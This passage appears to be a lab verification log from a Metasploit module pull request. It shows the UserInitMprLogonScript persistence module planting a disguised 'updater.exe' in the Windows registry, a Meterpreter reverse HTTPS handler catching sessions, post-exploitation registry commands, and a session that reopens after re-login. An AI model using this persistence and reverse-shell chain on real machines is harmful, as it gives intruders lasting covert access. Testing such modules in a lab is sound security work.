[+] Configured HKCU\Environment\UserInitMprLogonScript to execute C:\Users\DELL\AppData\Roaming\updater.exe
[*] Meterpreter-compatible Cleanup RC file: /home/nayera/.msf4/logs/persistence/NERO_20260301.4724/NERO_20260301.4724.rc
jobs
Jobs
====
Id Name Payload Payload opts
-- ---- ------- ------------
0 Exploit: windows/pers windows/meterpreter/r tcp://172.21.176.212:4
istence/userinit_mpr_ everse_tcp 444 (setting up)
logon_script
msf exploit(windows/persistence/userinit_mpr_logon_script) > jobs
Jobs
====
Id Name Payload Payload opts
-- ---- ------- ------------
0 Exploit: windows/pers windows/meterpreter/r tcp://172.21.176.212:4
istence/userinit_mpr_ everse_tcp 444 (setting up)
logon_script
msf exploit(windows/persistence/userinit_mpr_logon_script) > jobs -K
Stopping all jobs...
msf exploit(windows/persistence/userinit_mpr_logon_script) > jobs
Jobs
====
No active jobs.
msf exploit(windows/persistence/userinit_mpr_logon_script) > use exploit/multi/handler
[*] Using configured payload windows/x64/meterpreter/reverse_https
msf exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_https
payload => windows/x64/meterpreter/reverse_https
msf exploit(multi/handler) > set LHOST 172.21.176.212
LHOST => 172.21.176.212
msf exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf exploit(multi/handler) > run -j
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
msf exploit(multi/handler) >
[*] Started HTTPS reverse handler on https://172.21.176.212:4444
msf exploit(multi/handler) > jobs
Jobs
====
Id Name Payload Payload opts
-- ---- ------- ------------
1 Exploit: multi/handle windows/x64/meterpret https://172.21.176.212
r er/reverse_https :4444
msf exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: NERO\DELL
meterpreter > sysinfo
Computer : NERO
OS : Windows 11 24H2+ (10.0 Build 26200).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
meterpreter > reg queryval -k HKCU\\Environment -v UserInitMprLogonScript
Key: HKCU\Environment
Name: UserInitMprLogonScript
Type: REG_SZ
Data: C:\Users\DELL\AppData\Roaming\updater.exe
meterpreter > reg setval -k HKCU\\Environment -v testvalue -d test
Successfully set testvalue of REG_SZ.
meterpreter > reg deleteval -k HKCU\\Environment -v testvalue
Successfully deleted testvalue.
meterpreter > ls C:\\Users\\DELL\\AppData\\Roaming\\updater.exe
100777/rwxrwxrwx 7168 fil 2026-03-01 05:47:24 +0200 C:\Users\DELL\AppData\Roaming\updater.exe
meterpreter > background
[*] Backgrounding session 1...
msf exploit(multi/handler) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x64/win NERO\DELL @ NERO 172.21.176.212:4444 ->
dows 172.21.176.1:62359 (172
.21.176.1)
msf exploit(multi/handler) > sessions -K
[*] Killing all sessions...
[*] 172.21.176.1 - Meterpreter session 1 closed.
msf exploit(multi/handler) > sessions
Active sessions
===============
No active sessions.
msf exploit(multi/handler) >
```
### Logout, and log back in
```
msf exploit(multi/handler) >
[!] https://172.21.176.212:4444 handling request from 172.21.176.1; (UUID: bodrq2fe) Without a database connected that payload UUID tracking will not work!
[*] https://172.21.176.212:4444 handling request from 172.21.176.1; (UUID: bodrq2fe) Attaching orphaned/stageless session...
[!] https://172.21.176.212:4444 handling request from 172.21.176.1; (UUID: bodrq2fe) Without a database connected that payload UUID tracking will not work!
[*] Meterpreter session 2 opened (172.21.176.212:4444 -> 172.21.176.1:65263) at 2026-02-28 07:58:07 +0200
```

Some files were not shown because too many files have changed in this diff Show More